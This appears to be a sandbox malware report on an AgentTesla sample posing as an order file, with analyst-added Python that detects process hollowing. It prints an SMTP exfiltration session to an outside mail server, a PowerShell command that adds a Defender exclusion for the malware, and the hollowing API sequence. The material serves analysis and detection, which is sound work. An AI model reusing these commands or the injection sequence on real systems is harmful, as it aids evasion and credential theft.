Dec 4, 2024 22:02:05.226970911 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Dec 4, 2024 22:02:05.729644060 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 235 Authentication succeeded
Dec 4, 2024 22:02:05.730637074 CET | 49734 | 587 | 192.168.2.4 | 199.79.62.115 | MAIL FROM:<saless@mbarieservicesltd.com>
Dec 4, 2024 22:02:06.107299089 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 250 OK
Dec 4, 2024 22:02:06.110698938 CET | 49734 | 587 | 192.168.2.4 | 199.79.62.115 | RCPT TO:<iinfo@mbarieservicesltd.com>
Dec 4, 2024 22:02:06.535120964 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 250 Accepted
Dec 4, 2024 22:02:06.535592079 CET | 49734 | 587 | 192.168.2.4 | 199.79.62.115 | DATA
Dec 4, 2024 22:02:06.917433023 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Dec 4, 2024 22:02:06.918251038 CET | 49734 | 587 | 192.168.2.4 | 199.79.62.115 | .
Dec 4, 2024 22:02:07.405225039 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 250 OK id=1tIwVa-000xsl-2K
Dec 4, 2024 22:03:40.270678043 CET | 49734 | 587 | 192.168.2.4 | 199.79.62.115 | QUIT
Dec 4, 2024 22:03:40.849302053 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 221 md-54.webhostbox.net closing connection

Target ID: 0
Start time: 16:01:55
Start date: 04/12/2024
Path: C:\Users\user\Desktop\ORDER#023_2024.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ORDER#023_2024.exe"
Imagebase: 0x760000
File size: 642'048 bytes
MD5 hash: CB93D77357DF18FFB788E73E7F9E8BA1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 16:01:57
Start date: 04/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
Imagebase: 0x680000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 16:01:57
Start date: 04/12/2024
Path: C:\Users\user\Desktop\ORDER#023_2024.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ORDER#023_2024.exe"
Imagebase: 0x1e0000
File size: 642'048 bytes
MD5 hash: CB93D77357DF18FFB788E73E7F9E8BA1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                                          Target ID:4
                                                                                          Start time:16:01:57
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:16:01:57
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Users\user\Desktop\ORDER#023_2024.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER#023_2024.exe"
                                                                                          Imagebase:0xc10000
                                                                                          File size:642'048 bytes
                                                                                          MD5 hash:CB93D77357DF18FFB788E73E7F9E8BA1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:16:02:00
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff693ab0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

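The process list above is the part of a sandbox report an analyst usually triages by hand: the same binary (same MD5) shows up twice, once outside and once inside WOW64, and only the second instance carries Yara hits on its memory. As an added example, not part of the Joe Sandbox report or its tooling, the Python below parses "Target ID" records in exactly that Key:Value layout and flags that pattern. The sample text is transcribed from Targets 3, 4 and 5 above with the Yara Source fields shortened; the record keys are the report's own, the function names and the triage rules are mine.

```python
import re
from collections import Counter
from typing import Dict, List

# Sample input: Targets 3, 4 and 5 transcribed from the process list above.
# The Yara "Source" fields are shortened; every other value is as reported.
REPORT_EXCERPT = r"""
Target ID:3
Start time:16:01:57
Start date:04/12/2024
Path:C:\Users\user\Desktop\ORDER#023_2024.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\ORDER#023_2024.exe"
Imagebase:0x1e0000
MD5 hash:CB93D77357DF18FFB788E73E7F9E8BA1
Has exited:true

Target ID:4
Start time:16:01:57
Start date:04/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has exited:true

Target ID:5
Start time:16:01:57
Start date:04/12/2024
Path:C:\Users\user\Desktop\ORDER#023_2024.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\ORDER#023_2024.exe"
Imagebase:0xc10000
MD5 hash:CB93D77357DF18FFB788E73E7F9E8BA1
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2905038066.000000000305A000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2903371766.0000000000402000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2905038066.0000000003001000.sdmp, Author: Joe Security
Has exited:false
"""

_YARA_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<source>\S+),")


def parse_targets(text: str) -> List[Dict]:
    """Split the report into blank-line separated records of 'Key:Value'
    lines; '•' lines are Yara matches hanging off 'Yara matches:'."""
    records: List[Dict] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec: Dict = {"yara": []}
        for line in block.splitlines():
            line = line.strip()
            if line.startswith("•"):
                m = _YARA_RE.search(line)
                if m:
                    rec["yara"].append({"rule": m.group("rule").strip(),
                                        "source": m.group("source")})
            elif line:
                # split on the first ':' only, so paths and times keep theirs
                key, _, value = line.partition(":")
                rec[key.strip()] = value.strip()
        records.append(rec)
    return records


def normalize(rec: Dict) -> Dict:
    """Reduce a raw record to the fields the triage logic uses."""
    return {
        "id": int(rec["Target ID"]),
        "path": rec["Path"],
        "md5": rec["MD5 hash"].lower(),
        "wow64": rec.get("Wow64 process (32bit)") == "true",
        "exited": rec.get("Has exited") == "true",
        "yara_rules": [y["rule"] for y in rec["yara"]],
    }


def injection_candidates(procs: List[Dict]) -> List[int]:
    """Target IDs of a binary that appears more than once (same MD5) and
    whose memory carries Yara hits: the injected second instance, as with
    Target 5 above, rather than the loader that started first."""
    seen = Counter(p["md5"] for p in procs)
    return [p["id"] for p in procs if seen[p["md5"]] > 1 and p["yara_rules"]]


def bitness_changes(procs: List[Dict]) -> List[tuple]:
    """(earlier id, later id) pairs where the same MD5 ran once outside and
    once inside WOW64, which on this report separates Target 3 from Target 5."""
    by_md5: Dict[str, List[Dict]] = {}
    for p in procs:
        by_md5.setdefault(p["md5"], []).append(p)
    pairs = []
    for group in by_md5.values():
        for a, b in zip(group, group[1:]):
            if a["wow64"] != b["wow64"]:
                pairs.append((a["id"], b["id"]))
    return pairs


if __name__ == "__main__":
    procs = [normalize(r) for r in parse_targets(REPORT_EXCERPT)]
    print("injection candidates:", injection_candidates(procs))
    print("bitness changes:", bitness_changes(procs))
```

Both checks are heuristics: a self-relaunch with a bitness change is also what some installers and .NET AnyCPU launchers do, so the Yara hits on the second instance are what turn the pair into a finding here.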

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.2%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:2.2%
                                                                                            Total number of Nodes:232
                                                                                            Total number of Limit Nodes:8
                                                                                            execution_graph (rendered graph; the 232-node edge list is not reproduced). What it records, grouped by the memory region the nodes live in:
                                                                                            • 06F50000 region, dispatcher 6f57e60 (reached from 6f56fe9 via 6f571f2): CreateProcessA (6f56b58, 6f56be1), VirtualAllocEx (6f56410, 6f56450), WriteProcessMemory (6f564d0, 6f56518), ReadProcessMemory (6f565c0, 6f5660b), Wow64SetThreadContext (6f55f45), ResumeThread (6f55e90). Separately, PostMessageW at 6f59370 (reached from 6f590f0).
                                                                                            • 02A30000 region: CreateActCtxA (2a344b4, 2a358f8), GetModuleHandleW (2a3b308, reached from 2a3b0d0 / 2a3b0bf), DuplicateHandle (2a3cc40, 2a3d5a0, reached from 2a3d358).
                                                                                            The CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread calls under 6f57e60 are the API set that matches the "Creates a process in suspended mode (likely to inject code)" and "Injects a PE file into a foreign processes" signatures in the overview; the graph records the calls, not their order or arguments.
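The API set in that graph is the one a RunPE-style injector needs, but the graph alone does not show order, handles or flags. As an added example, not part of the report, the Python below runs a hollowing check over a per-process API call trace: it tracks the handles returned by a CreateProcess* call made with CREATE_SUSPENDED and reports the target once a WriteProcessMemory into it is followed by a (Wow64)SetThreadContext on its primary thread and a ResumeThread. The trace is constructed, since the execution graph gives only API names, and the ApiCall layout is an assumption about whatever tracer you feed it.

```python
from dataclasses import dataclass, field
from typing import Dict, List

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit for CreateProcess*


@dataclass
class ApiCall:
    """One traced call: API name plus the arguments/handles the check needs.
    Assumed layout; adapt to your tracer's output."""
    api: str
    args: Dict[str, int] = field(default_factory=dict)


@dataclass
class Target:
    hprocess: int
    hthread: int
    stages: List[str] = field(default_factory=list)


# Constructed trace (not from the report): the API set from the execution graph
# above, in the order a RunPE-style injector issues them. Handle values and
# addresses are made up; 0x400000 stands in for the payload's image base.
HOLLOWING_TRACE = [
    ApiCall("CreateProcessA", {"dwCreationFlags": CREATE_SUSPENDED, "hProcess": 0x1a8, "hThread": 0x1ac}),
    ApiCall("ReadProcessMemory", {"hProcess": 0x1a8, "lpBaseAddress": 0x7ffde008}),   # read PEB.ImageBaseAddress
    ApiCall("VirtualAllocEx", {"hProcess": 0x1a8, "lpAddress": 0x400000, "dwSize": 0x36000}),
    ApiCall("WriteProcessMemory", {"hProcess": 0x1a8, "lpBaseAddress": 0x400000}),    # headers + sections
    ApiCall("WriteProcessMemory", {"hProcess": 0x1a8, "lpBaseAddress": 0x7ffde008}),  # patch image base in PEB
    ApiCall("Wow64SetThreadContext", {"hThread": 0x1ac}),                             # point thread at new entry
    ApiCall("ResumeThread", {"hThread": 0x1ac}),
]

# Constructed benign trace: a normal child spawn with no suspended start.
BENIGN_TRACE = [
    ApiCall("CreateProcessA", {"dwCreationFlags": 0, "hProcess": 0x2b0, "hThread": 0x2b4}),
    ApiCall("WaitForSingleObject", {"hHandle": 0x2b0}),
]


def detect_hollowing(trace: List[ApiCall]) -> List[Target]:
    """Return every suspended-start child that, in order, had memory written
    into it, had its primary thread's context replaced, and was then resumed.
    Out-of-order calls (a resume before any context set, a write to some
    other process) do not advance the target, so a debugger-style suspended
    launch that is simply resumed is not reported."""
    targets: Dict[int, Target] = {}       # hProcess -> Target
    thread_owner: Dict[int, int] = {}     # hThread  -> hProcess
    for call in trace:
        a = call.args
        if call.api.startswith("CreateProcess"):
            if a.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
                t = Target(a["hProcess"], a["hThread"], ["suspended"])
                targets[t.hprocess] = t
                thread_owner[t.hthread] = t.hprocess
        elif call.api == "WriteProcessMemory":
            t = targets.get(a.get("hProcess"))
            if t and t.stages[-1] == "suspended":
                t.stages.append("write")
        elif call.api in ("SetThreadContext", "Wow64SetThreadContext"):
            t = targets.get(thread_owner.get(a.get("hThread")))
            if t and t.stages[-1] == "write":
                t.stages.append("context")
        elif call.api == "ResumeThread":
            t = targets.get(thread_owner.get(a.get("hThread")))
            if t and t.stages[-1] == "context":
                t.stages.append("resume")
    return [t for t in targets.values() if t.stages[-1] == "resume"]


if __name__ == "__main__":
    for name, trace in (("hollowing", HOLLOWING_TRACE), ("benign", BENIGN_TRACE)):
        hits = detect_hollowing(trace)
        print(name, "->", [(hex(t.hprocess), t.stages) for t in hits])
```

VirtualAllocEx and ReadProcessMemory are deliberately not required: some injectors write over the original mapping after NtUnmapViewOfSection instead of allocating, and the PEB read is optional, so keying on them would miss variants while the write / context / resume chain on a suspended child is what every hollowing needs.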

                                                                                            Control-flow Graph (rendered graph; basic-block edge list not reproduced)
                                                                                            • Function entry 6f548d8, blocks 6f548d8-6f54e0e; no API call nodes.
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q
                                                                                            • API String ID: 0-1614139903
                                                                                            • Opcode ID: 2c0f49e557c573d38cf74bedd0a643656bc3e5e5331bc8945871102f67e8b671
                                                                                            • Instruction ID: ead8b8f2e17d8e088212c063d8e3e3ad0c05a303f4a01f1159d2cba421a93376
                                                                                            • Opcode Fuzzy Hash: 2c0f49e557c573d38cf74bedd0a643656bc3e5e5331bc8945871102f67e8b671
                                                                                            • Instruction Fuzzy Hash: F7E16F34A00209DFDF45EFB8CA94AAEBBF2FB88304F118465D905A7758CB319D85CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a882dc851404549e7f26bbfc9e9139d4bdcae9bd9ca4e77d65d76a690edcad8c
                                                                                            • Instruction ID: d1b04ed1de1918edc41501052d53539d7f33daa6885b4f54263b9df73a39b517
                                                                                            • Opcode Fuzzy Hash: a882dc851404549e7f26bbfc9e9139d4bdcae9bd9ca4e77d65d76a690edcad8c
                                                                                            • Instruction Fuzzy Hash: EF213B35809268CFDBA0CF54D4447FCBBF9EB5A391F1150D69A2EA6251CB308E85CF41

                                                                                            Control-flow Graph (rendered graph; basic-block edge list not reproduced)
                                                                                            • Function entry 2a3b0d0, blocks 2a3b0d0-2a3b350; internal calls to 2a39ad4, 2a3b368 / 2a3b358, 2a3aab4, 2a3aac4, 2a3aad4, 2a3aae4; GetModuleHandleW in block 2a3b308-2a3b333.
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02A3B326
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID: N$N
                                                                                            • API String ID: 4139908857-1044518071
                                                                                            • Opcode ID: 5e6b7b9e796c4c2c8917bf95c11a74440aa3f2c8c17bcf6103740580f4812561
                                                                                            • Instruction ID: 6cfb2ad11cf20711521739f10fbd29634b40470dc92839527001e994a0d0445b
                                                                                            • Opcode Fuzzy Hash: 5e6b7b9e796c4c2c8917bf95c11a74440aa3f2c8c17bcf6103740580f4812561
                                                                                            • Instruction Fuzzy Hash: 77714770A00B458FD725DF6AD58475ABBF2FF88304F00892DE48AD7A50DB75E949CBA0

                                                                                            Control-flow Graph (rendered graph; basic-block edge list not reproduced)
                                                                                            • Function entry 6f56b4c, blocks 6f56b4c-6f56e9d; CreateProcessA in block 6f56ce7-6f56da1.
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F56D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: f23db75d5b2d8dfc3704b9740a735fdae5490ff9b4b12995161410a75d98da97
                                                                                            • Instruction ID: ab24889091ca65f0a92a7ad58ca827ff56cf2e55aa1855b696e6a57558ad26ef
                                                                                            • Opcode Fuzzy Hash: f23db75d5b2d8dfc3704b9740a735fdae5490ff9b4b12995161410a75d98da97
                                                                                            • Instruction Fuzzy Hash: 52A17771D002198FDF60CF68C844BAEBBB2EF48314F0585A9E958E7260DB749985CF91

                                                                                            Control-flow Graph (rendered graph; basic-block edge list not reproduced)
                                                                                            • Function entry 6f56b58 (0xc bytes past the 6f56b4c entry, same blocks 6f56b58-6f56e9d); CreateProcessA in block 6f56ce7-6f56da1.
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F56D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 9dc02dbd4c17787fa99de3b7f6780f9d76905f26d728b172ea2d2d9a9af64dd8
                                                                                            • Instruction ID: e02b63ebd646351758ea8dac08418ac17de90808570743c56adf6edb4fa2ccf6
                                                                                            • Opcode Fuzzy Hash: 9dc02dbd4c17787fa99de3b7f6780f9d76905f26d728b172ea2d2d9a9af64dd8
                                                                                            • Instruction Fuzzy Hash: 73916871D002198FDF60CF68C844BADBBB2FF48314F1585A9E958E7260DB749985CF91

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 650 2a344b4-2a359b9 CreateActCtxA 653 2a359c2-2a35a1c 650->653 654 2a359bb-2a359c1 650->654 661 2a35a2b-2a35a2f 653->661 662 2a35a1e-2a35a21 653->662 654->653 663 2a35a31-2a35a3d 661->663 664 2a35a40 661->664 662->661 663->664 666 2a35a41 664->666 666->666
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02A359A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 92904c4fe3c98b0ad4906edcd09753ed414170c4e919ec8f0a55deb572915716
                                                                                            • Instruction ID: 819b5c102a9feb81505b5f24182857cafd95d207aa8e45e8a0f508ad99b9fb87
                                                                                            • Opcode Fuzzy Hash: 92904c4fe3c98b0ad4906edcd09753ed414170c4e919ec8f0a55deb572915716
                                                                                            • Instruction Fuzzy Hash: 6E41D1B0C0075DCBDB24DFA9C884B9EBBB5BF49304F60806AE408AB255DB756945CF90

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 667 2a358ed-2a359b9 CreateActCtxA 669 2a359c2-2a35a1c 667->669 670 2a359bb-2a359c1 667->670 677 2a35a2b-2a35a2f 669->677 678 2a35a1e-2a35a21 669->678 670->669 679 2a35a31-2a35a3d 677->679 680 2a35a40 677->680 678->677 679->680 682 2a35a41 680->682 682->682
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02A359A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 4f5a9b84716c2e1a9b426a498662da05ae4eea1340f57c08fdd3bed68f131b1a
                                                                                            • Instruction ID: 3769f99b98d9f56983579e01fb461970e9592056325a04f57922a829da0ba1e2
                                                                                            • Opcode Fuzzy Hash: 4f5a9b84716c2e1a9b426a498662da05ae4eea1340f57c08fdd3bed68f131b1a
                                                                                            • Instruction Fuzzy Hash: 0441E3B0C00759CFDB24CFA9C884BCEBBB5BF49314F64805AE408AB255DB756945CF90

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 683 6f564c8-6f5651e 686 6f56520-6f5652c 683->686 687 6f5652e-6f5656d WriteProcessMemory 683->687 686->687 689 6f56576-6f565a6 687->689 690 6f5656f-6f56575 687->690 690->689
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F56560
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 10005399de344dec7d08e0e771cc70fe51a20acbc44aee4c3436ef98bffd68cd
                                                                                            • Instruction ID: 98d0253965caa84d31f10605215c11aa126546f0415a43c541ff0250a739db88
                                                                                            • Opcode Fuzzy Hash: 10005399de344dec7d08e0e771cc70fe51a20acbc44aee4c3436ef98bffd68cd
                                                                                            • Instruction Fuzzy Hash: F12124B1D003499FCB10DFA9C885BDEBFF4FB48314F10842AE959A7251D7789945CBA4

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 694 6f564d0-6f5651e 696 6f56520-6f5652c 694->696 697 6f5652e-6f5656d WriteProcessMemory 694->697 696->697 699 6f56576-6f565a6 697->699 700 6f5656f-6f56575 697->700 700->699
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F56560
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 24d206ceb08127fb5d704e7b985dcc6864024f206884cd098eff1ce1615e9edd
                                                                                            • Instruction ID: d9425ccd1d6d710a4c5a1fe1c8bc0e05060f5e7c128378f6c3bc7e610683b164
                                                                                            • Opcode Fuzzy Hash: 24d206ceb08127fb5d704e7b985dcc6864024f206884cd098eff1ce1615e9edd
                                                                                            • Instruction Fuzzy Hash: C02144B1D003499FCB10CFA9C880BEEBBF4FF48320F10842AE959A7251C7789944CBA4

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 704 2a3cc40-2a3d634 DuplicateHandle 706 2a3d636-2a3d63c 704->706 707 2a3d63d-2a3d65a 704->707 706->707
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D566,?,?,?,?,?), ref: 02A3D627
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: efe1f630d7ad6cf426dd6e7d4c03c3b8c1767b5140767cfb7e049e70508e13f6
                                                                                            • Instruction ID: ebc7624251abd9b8481249578b4666f3c59ff6df4157d7f6c037029381cc14d5
                                                                                            • Opcode Fuzzy Hash: efe1f630d7ad6cf426dd6e7d4c03c3b8c1767b5140767cfb7e049e70508e13f6
                                                                                            • Instruction Fuzzy Hash: 6421E4B5900258DFDB10CF9AD584AEEFFF8EB48324F14841AE958A7310D774A950CFA4

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 710 2a3d599-2a3d59e 711 2a3d5a0-2a3d634 DuplicateHandle 710->711 712 2a3d636-2a3d63c 711->712 713 2a3d63d-2a3d65a 711->713 712->713
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D566,?,?,?,?,?), ref: 02A3D627
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: deeccebe0055eca4a23189c5773c2d92cc8a85ead8dfe06437a3312388250b86
                                                                                            • Instruction ID: ea66edf64dce208cce2b94c319d63e31efc603ebf79f72e4eb039bc983a7493e
                                                                                            • Opcode Fuzzy Hash: deeccebe0055eca4a23189c5773c2d92cc8a85ead8dfe06437a3312388250b86
                                                                                            • Instruction Fuzzy Hash: 5221E3B5900248DFDB10CFAAD584ADEFBF4EB48324F14841AE958A7310D374A940CFA5

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 716 6f55efa-6f55f4b 718 6f55f4d-6f55f59 716->718 719 6f55f5b-6f55f8b Wow64SetThreadContext 716->719 718->719 721 6f55f94-6f55fc4 719->721 722 6f55f8d-6f55f93 719->722 722->721
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F55F7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 0905978806c150595ad5401ff7ddb3b95bf5d32ce8e146207fab52273bb1108a
                                                                                            • Instruction ID: cfd376b1750186e2b64703bf66cdb0b39150c4bfe3bbda2617638447e1a6006b
                                                                                            • Opcode Fuzzy Hash: 0905978806c150595ad5401ff7ddb3b95bf5d32ce8e146207fab52273bb1108a
                                                                                            • Instruction Fuzzy Hash: 952138B1D002498FDB10CFAAC4847EEFBF4AF88324F14842ED559A7240C7789945CFA4

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 726 6f565bb-6f5664d ReadProcessMemory 730 6f56656-6f56686 726->730 731 6f5664f-6f56655 726->731 731->730
                                                                                            APIs
